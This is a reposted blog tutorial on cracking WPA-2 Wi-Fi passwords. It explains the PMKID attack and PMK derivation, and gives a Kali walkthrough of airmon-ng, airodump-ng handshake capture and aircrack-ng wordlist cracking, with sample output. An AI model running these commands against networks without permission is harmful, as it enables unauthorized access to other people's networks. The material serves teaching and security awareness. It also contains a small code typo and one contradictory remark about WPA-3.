The Beginning of the End of WPA-2 — Cracking WPA-2 Just Got a Whole Lot Easier
source link: https://www.tuicool.com/articles/hit/UzIzUjU
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Here is me cracking WPA-2 using the four-way handshake with just a Raspberry PI and a $10 wi-fi transceiver:
For this I needed to capture the communication of the 4-way handshake, and then crack a PBKDF2-SHA1 hashed value. If a weak password is used, it is normally fairly inexpensive to crack the hash and gain access to the network. As PBKDF2 is a slow hashing method, it will be costly to crack fairly complex passwords with brute force. Typically when using Hashcat, we focus on a range of rules which considerably improves the chances of success, such placing a digit at the end or making the first character an upper case one.
But now things get even easier, as a Hashcat developer — Jens “Atom” Steube — has found a way to crack the network without the involvement of the 4-way handshake . With this an attacker sends a single EAPOL frame to the access point. They then get back the PMK (Pairwise Master Key) and use Hashcat to generate the Pre-Shared Key (PSK). With a reasonably priced GPU cracking infrastructure, many systems could now be cracked in just a few days.
There is thus no need to capture the four-way handshake and to make an association request with the access point.
But, remember, enterprise level systems — using WPA-Enterprise — are a great deal more difficult to crack than home devices (as they use a back-end authentication system, such as with a RADIUS server). So, if you’re a company, don’t go out and implement WPA-3 on your systems as your authentication infrastructure saves you here.
If you have a home-based router — using WPA-Personal — be worried … be very worried!
A basic demo of the WPA-2 process is here .
WPA-2 Hash Cracking Background
If you are interested, here’s a bit of background using the old method of cracking WPA-2.
Within WPA-2 we aim to create an initial pairing between the client and the access point, and then to identify them without giving away the password which has been used. In the initial authentication the client will either use pre-shared key (PSK), or use an EAP exchange through 802.1X (EAPOL).
The EAPOL exchange requires the usage of an authentication server. After this phase a shared secret key is created, and is known as the Pairwise Master Key (PMK). This uses PBKDF2-SHA1 as a hashing method, as the PBKDF2 part makes difficult to crack the hash (as there are a number of rounds used to slow down the hashing process). Within PSK, the PSK is defined with the PMK, but within EAPOL, the PMK is derived from EAP parameters. Generally EAPOL is more difficult to crack than using PSK. The PMK is generated from the PSK with:
PMK = PBKDF2(HMAC−SHA1, PSK, SSID, 4096, 256)
and where we use the SHA1 hashing function with HMAC as the message authentication code. In this case the PMK is generated from 4096 iterations of the hashing method and creates a 256-bit PMK. A simple Python script to generate the PMK is:
from pbkdf2 import PBKDF2
ssid = 'home'
phrase = 'qwerty123'
print "SSID: "+ssid
print "Pass phrase: "+phrase
print "Pairwise Master Key: " + PBKDF2(phrase, ssid, 4096).read(32).encode("hex"))
and a sample run is [ here ]:
SSID: home Pass phrase: qwerty123 Pairwise Master Key: bbaf585c301dc4d4024523535f42baf04630f852e2b01979ec0401edcdf 0e9c8
Within WPA-2 we get the four-way handshake process, and which is illustrated in Figure 1. It is designed so that the access point and wireless client can prove that they know each other by showing that the know the PSK/PMK, without ever releasing the key. They must the encrypt messages to each other, and if they can decrypt them, then they have successfully authenticated each other. In this way we can protect against a malious spoof access point which is broadcasting the valid looking SSID.
Overall the PMK will last for the complete authentication of the devices, and should be used sparenely. Thus the four-way handshake uses a derive key known as the Pairwise Transient Key (PTK), and which is generated from the PMK, a client nouce (ANounce), an access point nouce (SNouce), and the MAC addresses of the client and the access point (AP). These are then put into a pseudo random function, and generate a GTK (Group Temporal Key). The GTK is then used to decrypt multicast and broadcast traffic.
The details of the handshake are thus:
- AP sends a nonce to the STA (ANonce). The client creates the PTK.
- Client nonce (SNonce) to AP and a Message Integrity Code (MIC), and which includes the authentication.
- The AP creates PTK and sends the GTK, along with a sequence number together and an MIC.
- The client sends a confirmation to the AP.
A demo of the cracking of WPA-2 is:
The following shows the setup:
And test with airmon-ng:
root@kali:~ airmon-ng
PHY Interface Driver Chipset
null wlan0 ?????? Realtek Semiconductor Corp. RTL8188CUS 802.11n WLAN Adapter phy0 wlan1 ?????? Broadcom 43430 phy1 wlan2 rt2800usb Ralink Technology, Corp. RT2870/RT3070
root@kali:~ airmon-ng start wlan2
Found 4 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to run 'airmon-ng check kill'
PID Name 175 NetworkManager 363 wpa_supplicant 491 dhclient 609 dhclient
PHY Interface Driver Chipset
null wlan0 ?????? Realtek Semiconductor Corp. RTL8188CUS 802.11n WLAN Adapter phy0 wlan1 ?????? Broadcom 43430 phy1 wlan2 rt2800usb Ralink Technology, Corp. RT2870/RT3070
(mac80211 monitor mode vif enabled for [phy1]wlan2 on [phy1]wlan2mon) (mac80211 station mode vif disabled for [phy1]wlan2)
We can see we are now monitoring on wlan2mon, and to test:
root@kali:~ airodump-ng wlan2mon
CH 5 ][ Elapsed: 1 min ][ 2017-02-19 12:10
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:FC:AF:XX:XX:XX -44 39 893 24 1 22e WPA ZZZZZ
XX:A1:XX:XX:XX:XX -49 34 0 0 11 54e WPA2 CCMP PSK ZZZZZ
XX:D3:XX:XX:XX:XX -65 46 0 0 6 54e WPA2 CCMP PSK ZZZZZ
XX:21:XX:XX:XX:XX -90 3 1 0 13 54e WPA2 CCMP PSK ZZZZZ
BSSID STATION PWR Rate Lost Frames Probe
(not associated) XX:XX:XX:XX:XX:XX -44 0 - 1 0 10 ZZZZZ
XX:XX:XX:XX:XX:XX XX:XX:XX:XX:XX:XX -1 0e- 0 0 46
XX:XX:XX:XX:XX:XX XX:XX:XX:2B:XX:XX -20 0e- 0e 0 836
We can now grab the four way handshake with:
airodump-ng -c 1 --bssid XX:FC:AF:XX:XX:XX -w psk wlan2mon
This reads for the required BSSID on Channel 1, and will create a file which begins with psk, and has a .cap extension.
The output here is:
CH 1 ][ Elapsed: 18 s ][ 2017-02-19 21:38 ][ WPA handshake: XX:FC:AF:XX:XX:XX
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
XX:FC:AF:XX:XX:XX -30 0 215 3077 90 1 54e WPA2 CCMP PSK ZZZZZ
BSSID STATION PWR Rate Lost Frames Probe
XX:FC:AF:XX:XX:XX XX:XX:XX:XX:XX:XX 3 -22 0e- 1e 0 2569
Next we create a list of passwords in password.lst.
We can then analyse the cap files with:
aircrack-ng -w password.lst -b XX:FC:AF:XX:XX:XX psk*.cap
This gives the results of (where some details have been removed):
Aircrack-ng 1.2 rc4
[00:00:00] 2/1 keys tested (28.31 k/s)
Time left: 0 seconds 200.00%
KEY FOUND! [ ------- ]
Master Key : 5C ------------------- 0C
3A ------------------- 53
Transient Key : 6A ------------------- EB
4D ------------------- 72
7A ------------------- 87
80 ------------------- 21
EAPOL HMAC : C0 ------------------- 95
Conclusions
WEP was deeply flawed. WPA and WPA-2 were much better, but are both deeply flawed! Don’t trust them.
Long live WPA-3. If you can, think about a WPA-3 upgrade in the future.
Note: All of my demos are done on my own hardware and my own private network. Do not use these tools without the permission of those who may be affected.
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK